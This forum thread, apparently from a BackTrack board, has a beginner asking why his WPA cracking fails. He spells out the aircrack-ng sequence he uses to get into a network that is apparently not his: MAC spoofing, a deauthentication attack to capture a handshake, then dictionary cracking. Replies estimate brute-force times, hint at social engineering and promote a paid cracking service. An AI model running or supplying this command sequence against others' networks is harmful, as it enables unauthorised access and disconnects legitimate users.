Okay, now i found a password list with about 1 million passwords, and the aircrack ran for about 3 hours, but still didn't find the key? Is it possible to find a WPA key ???
Passphrase not in dictionary???!?!?
Hey.
I'm a newbie, just spent a lot of hours trying to hack a wireless network. I'm using a BackTrack 4 iso live cd to boot in BackTrack 4. I've spent a lot of hours to read a lot of "how to" guides, and I finally figured out how to do it. But when aircrack startet to "hack" the password, it just said "Passphare not in dictionary" after it tested 270 keys.
This is what i do:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
# then i choose a taget (channel, bssid, essid) #
airodump-ng -c 11 -w wpa -bssid 00:26:18:90:1D:4D wlan0
# then i open another shell #
aireplay-ng -0 5 -a 00:26:18:90:1D:4D wlan0
# then i get a WPA handshake #
aircrack-ng wpa-01.cap -w /pentest/wireless/aircrack-ng/test/password.lst
then aircrack starts propper, i think, and tests about 270 keys in less than 1 sec, and then it says: Passphrase not i dictionary quitting aircrack
What do i have to do?
Rasmus
..
Okay, now i found a password list with about 1 million passwords, and the aircrack ran for about 3 hours, but still didn't find the key? Is it possible to find a WPA key ???
hmm..
Okay, i kinda get the whole thing now..! The password list that comes with the backtrack live cd is just kinda "test" list, a really short one. I found some lists with more than 10 millions different combination, but that doesn't make any sense? It will take days, maybe even weeks for aircrack to test all the words - and that's no guarantee for finding the right one... And the lists only got proper words, not keys like: a5Gi877KgP1gH3 <- something like that. There have to be an easier way to crack a WPA, maybe something to do with the WPA-handshake or some kinda program that tries every possibly combination from 8-63 letters, both lower case, higher case, numbers and what else possible for a password to have in it. Can somebody help my out here?
You can try a generator to narrow down your combinations, run the cracker for days, or think of some other way to get the client to give you the password...
Use your imagination!
Did you try putting the correct passphrase in your list?Originally Posted by rallianto
A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.
Rather years I'd say... That's why WPA is still considered to be safe... If you want something faster, look under your AP box or set the security "level" to WEP...
Not one part is a bug or a fix.
To be successful here you should read all of the following.
ForumRules
ForumFAQ
If you are new to Back|Track
Back|Track Wiki
Failure to do so will probably get your threads deleted or worse.
I have the same problem. I have a handshake, tried 3 dictionaries, 2x <10 million entries, one big 60 million. Still no result.Here in my country we speak Bulgarian. So it is possible that the pass is something not in English, and the lists are generally for English. I will try a test with numbers only, but I will take a long time.
If you want to try all the possibilities you will need around....few billion years.
My computer tries 1500pass/sec. It has core 2 duo 3.00GHz Intel. But with my cuda enabled nvidia 9600GT i can go for up to 3100 passwords/s only with it.
So overall I reach ~4K. But there are many many many combinations.
Even with the cuda the computer spent 5 hours for the large list.
To try each numeric combination with 8 digits (100 000 000) my PC will need 7 hours. With 9 digits, 70. With 10-700 hours!!!
With letters it is even harder. I will need 21 monts only for 8 digits.
And for "only" 20 i will need....160173521855785540 years. Even if you get 4 monster video cards you have no chance....yet.
Here is one time calculator. lastbit.com/jscalc.asp
WPA, is not considered safe, atleast not by me, and im not talking about TBs of drive space, cracking clouds, fpga`s, server/gpu arrays, etc. WPA is useless now, to a smart little falsification attack taking 10-20 minutes. This being said, for the average auditor the best chance one has, is to use an online WPA auditing service.
PureH@te runs pretty much the best online wpa audit available right now, save yourself the time, MONEY, and effort and use his service for a mere $10. Available here
Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.
Posting Permissions